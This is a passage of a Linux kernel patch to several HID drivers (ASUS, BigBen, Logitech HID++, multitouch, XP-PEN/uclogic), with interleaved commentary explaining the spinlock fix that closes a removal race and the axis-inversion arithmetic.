++	spin_lock_init(&drvdata->kbd_backlight->lock);
+ 
+ 	ret = devm_led_classdev_register(&hdev->dev, &drvdata->kbd_backlight->cdev);
+ 	if (ret < 0) {
+@@ -1119,9 +1142,13 @@ err_stop_hw:
+ static void asus_remove(struct hid_device *hdev)
+ {
+ 	struct asus_drvdata *drvdata = hid_get_drvdata(hdev);
++	unsigned long flags;
+ 
+ 	if (drvdata->kbd_backlight) {
++		spin_lock_irqsave(&drvdata->kbd_backlight->lock, flags);
+ 		drvdata->kbd_backlight->removed = true;
++		spin_unlock_irqrestore(&drvdata->kbd_backlight->lock, flags);
++
+ 		cancel_work_sync(&drvdata->kbd_backlight->work);
+ 	}
+ 
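This driver and hid-bigbenff below close the same race in the same way: the remove path sets a flag and then calls cancel_work_sync(), while every scheduling site checks the flag under a spinlock, so no new work can be queued once teardown has begun. A kernel-style sketch of the pattern (struct dev_leds and the function names are illustrative stand-ins; not buildable outside the kernel):

struct dev_leds {
	spinlock_t lock;
	bool removed;
	struct work_struct work;
};

static void dev_schedule_work(struct dev_leds *led)
{
	unsigned long flags;

	spin_lock_irqsave(&led->lock, flags);
	if (!led->removed)		/* never queue work after removal */
		schedule_work(&led->work);
	spin_unlock_irqrestore(&led->lock, flags);
}

static void dev_remove(struct dev_leds *led)
{
	unsigned long flags;

	spin_lock_irqsave(&led->lock, flags);
	led->removed = true;		/* blocks any further scheduling */
	spin_unlock_irqrestore(&led->lock, flags);

	cancel_work_sync(&led->work);	/* wait out anything already queued */
}

Without the flag, a schedule_work() racing with removal could queue the work again after cancel_work_sync() returned, leaving the workqueue with a pointer into freed memory.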
+diff --git a/drivers/hid/hid-bigbenff.c b/drivers/hid/hid-bigbenff.c
+index e8b16665860d6..a02cb517b4c47 100644
+--- a/drivers/hid/hid-bigbenff.c
++++ b/drivers/hid/hid-bigbenff.c
+@@ -174,6 +174,7 @@ static __u8 pid0902_rdesc_fixed[] = {
+ struct bigben_device {
+ 	struct hid_device *hid;
+ 	struct hid_report *report;
++	spinlock_t lock;
+ 	bool removed;
+ 	u8 led_state;         /* LED1 = 1 .. LED4 = 8 */
+ 	u8 right_motor_on;    /* right motor off/on 0/1 */
+@@ -184,18 +185,39 @@ struct bigben_device {
+ 	struct work_struct worker;
+ };
+ 
++static inline void bigben_schedule_work(struct bigben_device *bigben)
++{
++	unsigned long flags;
++
++	spin_lock_irqsave(&bigben->lock, flags);
++	if (!bigben->removed)
++		schedule_work(&bigben->worker);
++	spin_unlock_irqrestore(&bigben->lock, flags);
++}
+ 
+ static void bigben_worker(struct work_struct *work)
+ {
+ 	struct bigben_device *bigben = container_of(work,
+ 		struct bigben_device, worker);
+ 	struct hid_field *report_field = bigben->report->field[0];
+-
+-	if (bigben->removed || !report_field)
++	bool do_work_led = false;
++	bool do_work_ff = false;
++	u8 *buf;
++	u32 len;
++	unsigned long flags;
++
++	buf = hid_alloc_report_buf(bigben->report, GFP_KERNEL);
++	if (!buf)
+ 		return;
+ 
++	len = hid_report_len(bigben->report);
++
++	/* LED work */
++	spin_lock_irqsave(&bigben->lock, flags);
++
+ 	if (bigben->work_led) {
+ 		bigben->work_led = false;
++		do_work_led = true;
+ 		report_field->value[0] = 0x01; /* 1 = led message */
+ 		report_field->value[1] = 0x08; /* reserved value, always 8 */
+ 		report_field->value[2] = bigben->led_state;
+@@ -204,11 +226,22 @@ static void bigben_worker(struct work_struct *work)
+ 		report_field->value[5] = 0x00; /* padding */
+ 		report_field->value[6] = 0x00; /* padding */
+ 		report_field->value[7] = 0x00; /* padding */
+-		hid_hw_request(bigben->hid, bigben->report, HID_REQ_SET_REPORT);
++		hid_output_report(bigben->report, buf);
++	}
++
++	spin_unlock_irqrestore(&bigben->lock, flags);
++
++	if (do_work_led) {
++		hid_hw_raw_request(bigben->hid, bigben->report->id, buf, len,
++				   bigben->report->type, HID_REQ_SET_REPORT);
+ 	}
+ 
++	/* FF work */
++	spin_lock_irqsave(&bigben->lock, flags);
++
+ 	if (bigben->work_ff) {
+ 		bigben->work_ff = false;
++		do_work_ff = true;
+ 		report_field->value[0] = 0x02; /* 2 = rumble effect message */
+ 		report_field->value[1] = 0x08; /* reserved value, always 8 */
+ 		report_field->value[2] = bigben->right_motor_on;
+@@ -217,8 +250,17 @@ static void bigben_worker(struct work_struct *work)
+ 		report_field->value[5] = 0x00; /* padding */
+ 		report_field->value[6] = 0x00; /* padding */
+ 		report_field->value[7] = 0x00; /* padding */
+-		hid_hw_request(bigben->hid, bigben->report, HID_REQ_SET_REPORT);
++		hid_output_report(bigben->report, buf);
++	}
++
++	spin_unlock_irqrestore(&bigben->lock, flags);
++
++	if (do_work_ff) {
++		hid_hw_raw_request(bigben->hid, bigben->report->id, buf, len,
++				   bigben->report->type, HID_REQ_SET_REPORT);
+ 	}
++
++	kfree(buf);
+ }
+ 
+ static int hid_bigben_play_effect(struct input_dev *dev, void *data,
+@@ -228,6 +270,7 @@ static int hid_bigben_play_effect(struct input_dev *dev, void *data,
+ 	struct bigben_device *bigben = hid_get_drvdata(hid);
+ 	u8 right_motor_on;
+ 	u8 left_motor_force;
++	unsigned long flags;
+ 
+ 	if (!bigben) {
+ 		hid_err(hid, "no device data\n");
+@@ -242,10 +285,13 @@ static int hid_bigben_play_effect(struct input_dev *dev, void *data,
+ 
+ 	if (right_motor_on != bigben->right_motor_on ||
+ 			left_motor_force != bigben->left_motor_force) {
++		spin_lock_irqsave(&bigben->lock, flags);
+ 		bigben->right_motor_on   = right_motor_on;
+ 		bigben->left_motor_force = left_motor_force;
+ 		bigben->work_ff = true;
+-		schedule_work(&bigben->worker);
++		spin_unlock_irqrestore(&bigben->lock, flags);
++
++		bigben_schedule_work(bigben);
+ 	}
+ 
+ 	return 0;
+@@ -259,6 +305,7 @@ static void bigben_set_led(struct led_classdev *led,
+ 	struct bigben_device *bigben = hid_get_drvdata(hid);
+ 	int n;
+ 	bool work;
++	unsigned long flags;
+ 
+ 	if (!bigben) {
+ 		hid_err(hid, "no device data\n");
+@@ -267,6 +314,7 @@ static void bigben_set_led(struct led_classdev *led,
+ 
+ 	for (n = 0; n < NUM_LEDS; n++) {
+ 		if (led == bigben->leds[n]) {
++			spin_lock_irqsave(&bigben->lock, flags);
+ 			if (value == LED_OFF) {
+ 				work = (bigben->led_state & BIT(n));
+ 				bigben->led_state &= ~BIT(n);
+@@ -274,10 +322,11 @@ static void bigben_set_led(struct led_classdev *led,
+ 				work = !(bigben->led_state & BIT(n));
+ 				bigben->led_state |= BIT(n);
+ 			}
++			spin_unlock_irqrestore(&bigben->lock, flags);
+ 
+ 			if (work) {
+ 				bigben->work_led = true;
+-				schedule_work(&bigben->worker);
++				bigben_schedule_work(bigben);
+ 			}
+ 			return;
+ 		}
+@@ -307,8 +356,12 @@ static enum led_brightness bigben_get_led(struct led_classdev *led)
+ static void bigben_remove(struct hid_device *hid)
+ {
+ 	struct bigben_device *bigben = hid_get_drvdata(hid);
++	unsigned long flags;
+ 
++	spin_lock_irqsave(&bigben->lock, flags);
+ 	bigben->removed = true;
++	spin_unlock_irqrestore(&bigben->lock, flags);
++
+ 	cancel_work_sync(&bigben->worker);
+ 	hid_hw_stop(hid);
+ }
+@@ -318,7 +371,6 @@ static int bigben_probe(struct hid_device *hid,
+ {
+ 	struct bigben_device *bigben;
+ 	struct hid_input *hidinput;
+-	struct list_head *report_list;
+ 	struct led_classdev *led;
+ 	char *name;
+ 	size_t name_sz;
+@@ -343,14 +395,12 @@ static int bigben_probe(struct hid_device *hid,
+ 		return error;
+ 	}
+ 
+-	report_list = &hid->report_enum[HID_OUTPUT_REPORT].report_list;
+-	if (list_empty(report_list)) {
++	bigben->report = hid_validate_values(hid, HID_OUTPUT_REPORT, 0, 0, 8);
++	if (!bigben->report) {
+ 		hid_err(hid, "no output report found\n");
+ 		error = -ENODEV;
+ 		goto error_hw_stop;
+ 	}
+-	bigben->report = list_entry(report_list->next,
+-		struct hid_report, list);
+ 
+ 	if (list_empty(&hid->inputs)) {
+ 		hid_err(hid, "no inputs found\n");
+@@ -362,6 +412,7 @@ static int bigben_probe(struct hid_device *hid,
+ 	set_bit(FF_RUMBLE, hidinput->input->ffbit);
+ 
+ 	INIT_WORK(&bigben->worker, bigben_worker);
++	spin_lock_init(&bigben->lock);
+ 
+ 	error = input_ff_create_memless(hidinput->input, NULL,
+ 		hid_bigben_play_effect);
+@@ -402,7 +453,7 @@ static int bigben_probe(struct hid_device *hid,
+ 	bigben->left_motor_force = 0;
+ 	bigben->work_led = true;
+ 	bigben->work_ff = true;
+-	schedule_work(&bigben->worker);
++	bigben_schedule_work(bigben);
+ 
+ 	hid_info(hid, "LED and force feedback support for BigBen gamepad\n");
+ 
+diff --git a/drivers/hid/hid-debug.c b/drivers/hid/hid-debug.c
+index 2ca6ab600bc9f..15e35702773cd 100644
+--- a/drivers/hid/hid-debug.c
++++ b/drivers/hid/hid-debug.c
+@@ -972,6 +972,7 @@ static const char *keys[KEY_MAX + 1] = {
+ 	[KEY_KBD_LAYOUT_NEXT] = "KbdLayoutNext",
+ 	[KEY_EMOJI_PICKER] = "EmojiPicker",
+ 	[KEY_DICTATE] = "Dictate",
++	[KEY_MICMUTE] = "MicrophoneMute",
+ 	[KEY_BRIGHTNESS_MIN] = "BrightnessMin",
+ 	[KEY_BRIGHTNESS_MAX] = "BrightnessMax",
+ 	[KEY_BRIGHTNESS_AUTO] = "BrightnessAuto",
+diff --git a/drivers/hid/hid-ids.h b/drivers/hid/hid-ids.h
+index 9e36b4cd905ee..2235d78784b1b 100644
+--- a/drivers/hid/hid-ids.h
++++ b/drivers/hid/hid-ids.h
+@@ -1299,7 +1299,9 @@
+ #define USB_DEVICE_ID_UGEE_XPPEN_TABLET_DECO01	0x0042
+ #define USB_DEVICE_ID_UGEE_XPPEN_TABLET_DECO01_V2	0x0905
+ #define USB_DEVICE_ID_UGEE_XPPEN_TABLET_DECO_L	0x0935
++#define USB_DEVICE_ID_UGEE_XPPEN_TABLET_DECO_PRO_MW	0x0934
+ #define USB_DEVICE_ID_UGEE_XPPEN_TABLET_DECO_PRO_S	0x0909
++#define USB_DEVICE_ID_UGEE_XPPEN_TABLET_DECO_PRO_SW	0x0933
+ #define USB_DEVICE_ID_UGEE_XPPEN_TABLET_STAR06	0x0078
+ #define USB_DEVICE_ID_UGEE_TABLET_G5		0x0074
+ #define USB_DEVICE_ID_UGEE_TABLET_EX07S		0x0071
+diff --git a/drivers/hid/hid-input.c b/drivers/hid/hid-input.c
+index 7e94ca1822afb..c3f80b516f398 100644
+--- a/drivers/hid/hid-input.c
++++ b/drivers/hid/hid-input.c
+@@ -378,6 +378,10 @@ static const struct hid_device_id hid_battery_quirks[] = {
+ 	  HID_BATTERY_QUIRK_IGNORE },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_UGEE, USB_DEVICE_ID_UGEE_XPPEN_TABLET_DECO_L),
+ 	  HID_BATTERY_QUIRK_AVOID_QUERY },
++	{ HID_USB_DEVICE(USB_VENDOR_ID_UGEE, USB_DEVICE_ID_UGEE_XPPEN_TABLET_DECO_PRO_MW),
++	  HID_BATTERY_QUIRK_AVOID_QUERY },
++	{ HID_USB_DEVICE(USB_VENDOR_ID_UGEE, USB_DEVICE_ID_UGEE_XPPEN_TABLET_DECO_PRO_SW),
++	  HID_BATTERY_QUIRK_AVOID_QUERY },
+ 	{ HID_I2C_DEVICE(USB_VENDOR_ID_ELAN, I2C_DEVICE_ID_HP_ENVY_X360_15),
+ 	  HID_BATTERY_QUIRK_IGNORE },
+ 	{ HID_I2C_DEVICE(USB_VENDOR_ID_ELAN, I2C_DEVICE_ID_HP_ENVY_X360_15T_DR100),
+@@ -793,6 +797,14 @@ static void hidinput_configure_usage(struct hid_input *hidinput, struct hid_fiel
+ 			break;
+ 		}
+ 
++		if ((usage->hid & 0xf0) == 0xa0) {	/* SystemControl */
++			switch (usage->hid & 0xf) {
++			case 0x9: map_key_clear(KEY_MICMUTE); break;
++			default: goto ignore;
++			}
++			break;
++		}
++
+ 		if ((usage->hid & 0xf0) == 0xb0) {	/* SC - Display */
+ 			switch (usage->hid & 0xf) {
+ 			case 0x05: map_key_clear(KEY_SWITCHVIDEOMODE); break;
+diff --git a/drivers/hid/hid-logitech-hidpp.c b/drivers/hid/hid-logitech-hidpp.c
+index 07b8506eecc41..fdb66dc065822 100644
+--- a/drivers/hid/hid-logitech-hidpp.c
++++ b/drivers/hid/hid-logitech-hidpp.c
+@@ -77,6 +77,7 @@ MODULE_PARM_DESC(disable_tap_to_click,
+ #define HIDPP_QUIRK_HIDPP_WHEELS		BIT(26)
+ #define HIDPP_QUIRK_HIDPP_EXTRA_MOUSE_BTNS	BIT(27)
+ #define HIDPP_QUIRK_HIDPP_CONSUMER_VENDOR_KEYS	BIT(28)
++#define HIDPP_QUIRK_HI_RES_SCROLL_1P0		BIT(29)
+ 
+ /* These are just aliases for now */
+ #define HIDPP_QUIRK_KBD_SCROLL_WHEEL HIDPP_QUIRK_HIDPP_WHEELS
+@@ -3472,14 +3473,8 @@ static int hidpp_initialize_hires_scroll(struct hidpp_device *hidpp)
+ 			hid_dbg(hidpp->hid_dev, "Detected HID++ 2.0 hi-res scrolling\n");
+ 		}
+ 	} else {
+-		struct hidpp_report response;
+-
+-		ret = hidpp_send_rap_command_sync(hidpp,
+-						  REPORT_ID_HIDPP_SHORT,
+-						  HIDPP_GET_REGISTER,
+-						  HIDPP_ENABLE_FAST_SCROLL,
+-						  NULL, 0, &response);
+-		if (!ret) {
++		/* We cannot detect fast scrolling support on HID++ 1.0 devices */
++		if (hidpp->quirks & HIDPP_QUIRK_HI_RES_SCROLL_1P0) {
+ 			hidpp->capabilities |= HIDPP_CAPABILITY_HIDPP10_FAST_SCROLL;
+ 			hid_dbg(hidpp->hid_dev, "Detected HID++ 1.0 fast scroll\n");
+ 		}
+@@ -4107,6 +4102,7 @@ static int hidpp_probe(struct hid_device *hdev, const struct hid_device_id *id)
+ 	bool connected;
+ 	unsigned int connect_mask = HID_CONNECT_DEFAULT;
+ 	struct hidpp_ff_private_data data;
++	bool will_restart = false;
+ 
+ 	/* report_fixup needs drvdata to be set before we call hid_parse */
+ 	hidpp = devm_kzalloc(&hdev->dev, sizeof(*hidpp), GFP_KERNEL);
+@@ -4162,6 +4158,10 @@ static int hidpp_probe(struct hid_device *hdev, const struct hid_device_id *id)
+ 			return ret;
+ 	}
+ 
++	if (hidpp->quirks & HIDPP_QUIRK_DELAYED_INIT ||
++	    hidpp->quirks & HIDPP_QUIRK_UNIFYING)
++		will_restart = true;
++
+ 	INIT_WORK(&hidpp->work, delayed_work_cb);
+ 	mutex_init(&hidpp->send_mutex);
+ 	init_waitqueue_head(&hidpp->wait);
+@@ -4176,7 +4176,7 @@ static int hidpp_probe(struct hid_device *hdev, const struct hid_device_id *id)
+ 	 * Plain USB connections need to actually call start and open
+ 	 * on the transport driver to allow incoming data.
+ 	 */
+-	ret = hid_hw_start(hdev, 0);
++	ret = hid_hw_start(hdev, will_restart ? 0 : connect_mask);
+ 	if (ret) {
+ 		hid_err(hdev, "hw start failed\n");
+ 		goto hid_hw_start_fail;
+@@ -4213,6 +4213,7 @@ static int hidpp_probe(struct hid_device *hdev, const struct hid_device_id *id)
+ 			hidpp->wireless_feature_index = 0;
+ 		else if (ret)
+ 			goto hid_hw_init_fail;
++		ret = 0;
+ 	}
+ 
+ 	if (connected && (hidpp->quirks & HIDPP_QUIRK_CLASS_WTP)) {
+@@ -4227,19 +4228,21 @@ static int hidpp_probe(struct hid_device *hdev, const struct hid_device_id *id)
+ 
+ 	hidpp_connect_event(hidpp);
+ 
+-	/* Reset the HID node state */
+-	hid_device_io_stop(hdev);
+-	hid_hw_close(hdev);
+-	hid_hw_stop(hdev);
++	if (will_restart) {
++		/* Reset the HID node state */
++		hid_device_io_stop(hdev);
++		hid_hw_close(hdev);
++		hid_hw_stop(hdev);
+ 
+-	if (hidpp->quirks & HIDPP_QUIRK_NO_HIDINPUT)
+-		connect_mask &= ~HID_CONNECT_HIDINPUT;
++		if (hidpp->quirks & HIDPP_QUIRK_NO_HIDINPUT)
++			connect_mask &= ~HID_CONNECT_HIDINPUT;
+ 
+-	/* Now export the actual inputs and hidraw nodes to the world */
+-	ret = hid_hw_start(hdev, connect_mask);
+-	if (ret) {
+-		hid_err(hdev, "%s:hid_hw_start returned error\n", __func__);
+-		goto hid_hw_start_fail;
++		/* Now export the actual inputs and hidraw nodes to the world */
++		ret = hid_hw_start(hdev, connect_mask);
++		if (ret) {
++			hid_err(hdev, "%s:hid_hw_start returned error\n", __func__);
++			goto hid_hw_start_fail;
++		}
+ 	}
+ 
+ 	if (hidpp->quirks & HIDPP_QUIRK_CLASS_G920) {
+@@ -4297,9 +4300,15 @@ static const struct hid_device_id hidpp_devices[] = {
+ 	  HID_BLUETOOTH_DEVICE(USB_VENDOR_ID_LOGITECH,
+ 		USB_DEVICE_ID_LOGITECH_T651),
+ 	  .driver_data = HIDPP_QUIRK_CLASS_WTP },
++	{ /* Mouse Logitech Anywhere MX */
++	  LDJ_DEVICE(0x1017), .driver_data = HIDPP_QUIRK_HI_RES_SCROLL_1P0 },
+ 	{ /* Mouse logitech M560 */
+ 	  LDJ_DEVICE(0x402d),
+ 	  .driver_data = HIDPP_QUIRK_DELAYED_INIT | HIDPP_QUIRK_CLASS_M560 },
++	{ /* Mouse Logitech M705 (firmware RQM17) */
++	  LDJ_DEVICE(0x101b), .driver_data = HIDPP_QUIRK_HI_RES_SCROLL_1P0 },
++	{ /* Mouse Logitech Performance MX */
++	  LDJ_DEVICE(0x101a), .driver_data = HIDPP_QUIRK_HI_RES_SCROLL_1P0 },
+ 	{ /* Keyboard logitech K400 */
+ 	  LDJ_DEVICE(0x4024),
+ 	  .driver_data = HIDPP_QUIRK_CLASS_K400 },
+diff --git a/drivers/hid/hid-multitouch.c b/drivers/hid/hid-multitouch.c
+index 372cbdd223e09..e31be0cb8b850 100644
+--- a/drivers/hid/hid-multitouch.c
++++ b/drivers/hid/hid-multitouch.c
+@@ -71,6 +71,7 @@ MODULE_LICENSE("GPL");
+ #define MT_QUIRK_SEPARATE_APP_REPORT	BIT(19)
+ #define MT_QUIRK_FORCE_MULTI_INPUT	BIT(20)
+ #define MT_QUIRK_DISABLE_WAKEUP		BIT(21)
++#define MT_QUIRK_ORIENTATION_INVERT	BIT(22)
+ 
+ #define MT_INPUTMODE_TOUCHSCREEN	0x02
+ #define MT_INPUTMODE_TOUCHPAD		0x03
+@@ -1009,6 +1010,7 @@ static int mt_process_slot(struct mt_device *td, struct input_dev *input,
+ 			    struct mt_usages *slot)
+ {
+ 	struct input_mt *mt = input->mt;
++	struct hid_device *hdev = td->hdev;
+ 	__s32 quirks = app->quirks;
+ 	bool valid = true;
+ 	bool confidence_state = true;
+@@ -1086,6 +1088,10 @@ static int mt_process_slot(struct mt_device *td, struct input_dev *input,
+ 		int orientation = wide;
+ 		int max_azimuth;
+ 		int azimuth;
++		int x;
++		int y;
++		int cx;
++		int cy;
+ 
+ 		if (slot->a != DEFAULT_ZERO) {
+ 			/*
+@@ -1104,6 +1110,9 @@ static int mt_process_slot(struct mt_device *td, struct input_dev *input,
+ 			if (azimuth > max_azimuth * 2)
+ 				azimuth -= max_azimuth * 4;
+ 			orientation = -azimuth;
++			if (quirks & MT_QUIRK_ORIENTATION_INVERT)
++				orientation = -orientation;
++
+ 		}
+ 
+ 		if (quirks & MT_QUIRK_TOUCH_SIZE_SCALING) {
+@@ -1115,10 +1124,23 @@ static int mt_process_slot(struct mt_device *td, struct input_dev *input,
+ 			minor = minor >> 1;
+ 		}
+ 
+-		input_event(input, EV_ABS, ABS_MT_POSITION_X, *slot->x);
+-		input_event(input, EV_ABS, ABS_MT_POSITION_Y, *slot->y);
+-		input_event(input, EV_ABS, ABS_MT_TOOL_X, *slot->cx);
+-		input_event(input, EV_ABS, ABS_MT_TOOL_Y, *slot->cy);
++		x = hdev->quirks & HID_QUIRK_X_INVERT ?
++			input_abs_get_max(input, ABS_MT_POSITION_X) - *slot->x :
++			*slot->x;
++		y = hdev->quirks & HID_QUIRK_Y_INVERT ?
++			input_abs_get_max(input, ABS_MT_POSITION_Y) - *slot->y :
++			*slot->y;
++		cx = hdev->quirks & HID_QUIRK_X_INVERT ?
++			input_abs_get_max(input, ABS_MT_POSITION_X) - *slot->cx :
++			*slot->cx;
++		cy = hdev->quirks & HID_QUIRK_Y_INVERT ?
++			input_abs_get_max(input, ABS_MT_POSITION_Y) - *slot->cy :
++			*slot->cy;
++
++		input_event(input, EV_ABS, ABS_MT_POSITION_X, x);
++		input_event(input, EV_ABS, ABS_MT_POSITION_Y, y);
++		input_event(input, EV_ABS, ABS_MT_TOOL_X, cx);
++		input_event(input, EV_ABS, ABS_MT_TOOL_Y, cy);
+ 		input_event(input, EV_ABS, ABS_MT_DISTANCE, !*slot->tip_state);
+ 		input_event(input, EV_ABS, ABS_MT_ORIENTATION, orientation);
+ 		input_event(input, EV_ABS, ABS_MT_PRESSURE, *slot->p);
+@@ -1735,6 +1757,15 @@ static int mt_probe(struct hid_device *hdev, const struct hid_device_id *id)
+ 	if (id->vendor == HID_ANY_ID && id->product == HID_ANY_ID)
+ 		td->serial_maybe = true;
+ 
++
++	/* Orientation is inverted if exactly one of the X or Y axes
++	 * is flipped; flipping both leaves orientation unchanged.
++	 */
++	if (hdev->quirks & (HID_QUIRK_X_INVERT | HID_QUIRK_Y_INVERT) &&
++	    !((hdev->quirks & HID_QUIRK_X_INVERT)
++	      && (hdev->quirks & HID_QUIRK_Y_INVERT)))
++		td->mtclass.quirks = MT_QUIRK_ORIENTATION_INVERT;
++
+ 	/* This allows the driver to correctly support devices
+ 	 * that emit events over several HID messages.
+ 	 */
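The inversion applied above is a plain reflection on an absolute axis: the reported coordinate is replaced by the axis maximum minus the coordinate. A runnable example, assuming a 12-bit axis purely for illustration:

#include <stdio.h>

int main(void)
{
	int max_x = 4095;	/* ABS_MT_POSITION_X maximum (assumed) */
	int x = 100;

	/* HID_QUIRK_X_INVERT: mirror the coordinate across the axis */
	printf("inverted x = %d\n", max_x - x);	/* 3995 */
	return 0;
}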
+diff --git a/drivers/hid/hid-quirks.c b/drivers/hid/hid-quirks.c
+index 5bc91f68b3747..66e64350f1386 100644
+--- a/drivers/hid/hid-quirks.c
++++ b/drivers/hid/hid-quirks.c
+@@ -1237,7 +1237,7 @@ EXPORT_SYMBOL_GPL(hid_quirks_exit);
+ static unsigned long hid_gets_squirk(const struct hid_device *hdev)
+ {
+ 	const struct hid_device_id *bl_entry;
+-	unsigned long quirks = 0;
++	unsigned long quirks = hdev->initial_quirks;
+ 
+ 	if (hid_match_id(hdev, hid_ignore_list))
+ 		quirks |= HID_QUIRK_IGNORE;
+diff --git a/drivers/hid/hid-uclogic-core.c b/drivers/hid/hid-uclogic-core.c
+index cfbbc39807a69..bfbb51f8b5beb 100644
+--- a/drivers/hid/hid-uclogic-core.c
++++ b/drivers/hid/hid-uclogic-core.c
+@@ -22,25 +22,6 @@
+ 
+ #include "hid-ids.h"
+ 
+-/* Driver data */
+-struct uclogic_drvdata {
+-	/* Interface parameters */
+-	struct uclogic_params params;
+-	/* Pointer to the replacement report descriptor. NULL if none. */
+-	__u8 *desc_ptr;
+-	/*
+-	 * Size of the replacement report descriptor.
+-	 * Only valid if desc_ptr is not NULL
+-	 */
+-	unsigned int desc_size;
+-	/* Pen input device */
+-	struct input_dev *pen_input;
+-	/* In-range timer */
+-	struct timer_list inrange_timer;
+-	/* Last rotary encoder state, or U8_MAX for none */
+-	u8 re_state;
+-};
+-
+ /**
+  * uclogic_inrange_timeout - handle pen in-range state timeout.
+  * Emulate input events normally generated when pen goes out of range for
+@@ -202,6 +183,7 @@ static int uclogic_probe(struct hid_device *hdev,
+ 	}
+ 	timer_setup(&drvdata->inrange_timer, uclogic_inrange_timeout, 0);
+ 	drvdata->re_state = U8_MAX;
++	drvdata->quirks = id->driver_data;
+ 	hid_set_drvdata(hdev, drvdata);
+ 
+ 	/* Initialize the device and retrieve interface parameters */
+@@ -529,8 +511,14 @@ static const struct hid_device_id uclogic_devices[] = {
+ 				USB_DEVICE_ID_UGEE_XPPEN_TABLET_DECO01_V2) },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_UGEE,
+ 				USB_DEVICE_ID_UGEE_XPPEN_TABLET_DECO_L) },
++	{ HID_USB_DEVICE(USB_VENDOR_ID_UGEE,
++				USB_DEVICE_ID_UGEE_XPPEN_TABLET_DECO_PRO_MW),
++		.driver_data = UCLOGIC_MOUSE_FRAME_QUIRK | UCLOGIC_BATTERY_QUIRK },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_UGEE,
+ 				USB_DEVICE_ID_UGEE_XPPEN_TABLET_DECO_PRO_S) },
++	{ HID_USB_DEVICE(USB_VENDOR_ID_UGEE,
++				USB_DEVICE_ID_UGEE_XPPEN_TABLET_DECO_PRO_SW),
++		.driver_data = UCLOGIC_MOUSE_FRAME_QUIRK | UCLOGIC_BATTERY_QUIRK },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_UGEE,
+ 				USB_DEVICE_ID_UGEE_XPPEN_TABLET_STAR06) },
+ 	{ }
+diff --git a/drivers/hid/hid-uclogic-params.c b/drivers/hid/hid-uclogic-params.c
+index 3c5eea3df3288..0cc03c11ecc22 100644
+--- a/drivers/hid/hid-uclogic-params.c
++++ b/drivers/hid/hid-uclogic-params.c
+@@ -1222,6 +1222,11 @@ static int uclogic_params_ugee_v2_init_frame_mouse(struct uclogic_params *p)
+  */
+ static bool uclogic_params_ugee_v2_has_battery(struct hid_device *hdev)
+ {
++	struct uclogic_drvdata *drvdata = hid_get_drvdata(hdev);
++
++	if (drvdata->quirks & UCLOGIC_BATTERY_QUIRK)
++		return true;
++
+ 	/* The XP-PEN Deco LW vendor, product and version are identical to the
+ 	 * Deco L. The only difference reported by their firmware is the product
+ 	 * name. Add a quirk to support battery reporting on the wireless
+@@ -1298,6 +1303,7 @@ static int uclogic_params_ugee_v2_init(struct uclogic_params *params,
+ 				       struct hid_device *hdev)
+ {
+ 	int rc = 0;
++	struct uclogic_drvdata *drvdata;
+ 	struct usb_interface *iface;
+ 	__u8 bInterfaceNumber;
+ 	const int str_desc_len = 12;
+@@ -1316,6 +1322,7 @@ static int uclogic_params_ugee_v2_init(struct uclogic_params *params,
+ 		goto cleanup;
+ 	}
+ 
++	drvdata = hid_get_drvdata(hdev);
+ 	iface = to_usb_interface(hdev->dev.parent);
+ 	bInterfaceNumber = iface->cur_altsetting->desc.bInterfaceNumber;
+ 
+@@ -1382,6 +1389,9 @@ static int uclogic_params_ugee_v2_init(struct uclogic_params *params,
+ 	p.pen.subreport_list[0].id = UCLOGIC_RDESC_V1_FRAME_ID;
+ 
+ 	/* Initialize the frame interface */
++	if (drvdata->quirks & UCLOGIC_MOUSE_FRAME_QUIRK)
++		frame_type = UCLOGIC_PARAMS_FRAME_MOUSE;
++
+ 	switch (frame_type) {
+ 	case UCLOGIC_PARAMS_FRAME_DIAL:
+ 	case UCLOGIC_PARAMS_FRAME_MOUSE:
+@@ -1659,8 +1669,12 @@ int uclogic_params_init(struct uclogic_params *params,
+ 		     USB_DEVICE_ID_UGEE_XPPEN_TABLET_DECO01_V2):
+ 	case VID_PID(USB_VENDOR_ID_UGEE,
+ 		     USB_DEVICE_ID_UGEE_XPPEN_TABLET_DECO_L):
++	case VID_PID(USB_VENDOR_ID_UGEE,
++		     USB_DEVICE_ID_UGEE_XPPEN_TABLET_DECO_PRO_MW):
+ 	case VID_PID(USB_VENDOR_ID_UGEE,
+ 		     USB_DEVICE_ID_UGEE_XPPEN_TABLET_DECO_PRO_S):
++	case VID_PID(USB_VENDOR_ID_UGEE,
++		     USB_DEVICE_ID_UGEE_XPPEN_TABLET_DECO_PRO_SW):
+ 		rc = uclogic_params_ugee_v2_init(&p, hdev);
+ 		if (rc != 0)
+ 			goto cleanup;
+diff --git a/drivers/hid/hid-uclogic-params.h b/drivers/hid/hid-uclogic-params.h
+index a97477c02ff82..b0e7f3807939b 100644
+--- a/drivers/hid/hid-uclogic-params.h
++++ b/drivers/hid/hid-uclogic-params.h
+@@ -19,6 +19,9 @@
+ #include <linux/usb.h>
+ #include <linux/hid.h>
+ 
++#define UCLOGIC_MOUSE_FRAME_QUIRK	BIT(0)
++#define UCLOGIC_BATTERY_QUIRK		BIT(1)
++
+ /* Types of pen in-range reporting */
+ enum uclogic_params_pen_inrange {
+ 	/* Normal reports: zero - out of proximity, one - in proximity */
+@@ -215,6 +218,27 @@ struct uclogic_params {
+ 	struct uclogic_params_frame frame_list[3];
+ };
+ 
++/* Driver data */
++struct uclogic_drvdata {
++	/* Interface parameters */
++	struct uclogic_params params;
++	/* Pointer to the replacement report descriptor. NULL if none. */
++	__u8 *desc_ptr;
++	/*
++	 * Size of the replacement report descriptor.
++	 * Only valid if desc_ptr is not NULL
++	 */
++	unsigned int desc_size;
++	/* Pen input device */
++	struct input_dev *pen_input;
++	/* In-range timer */
++	struct timer_list inrange_timer;
++	/* Last rotary encoder state, or U8_MAX for none */
++	u8 re_state;
++	/* Device quirks */
++	unsigned long quirks;
++};
++
+ /* Initialize a tablet interface and discover its parameters */
+ extern int uclogic_params_init(struct uclogic_params *params,
+ 				struct hid_device *hdev);
+diff --git a/drivers/hid/i2c-hid/i2c-hid-core.c b/drivers/hid/i2c-hid/i2c-hid-core.c
+index a9428b7f34a46..969f8eb086f02 100644
+--- a/drivers/hid/i2c-hid/i2c-hid-core.c
++++ b/drivers/hid/i2c-hid/i2c-hid-core.c
+@@ -1035,6 +1035,10 @@ int i2c_hid_core_probe(struct i2c_client *client, struct i2chid_ops *ops,
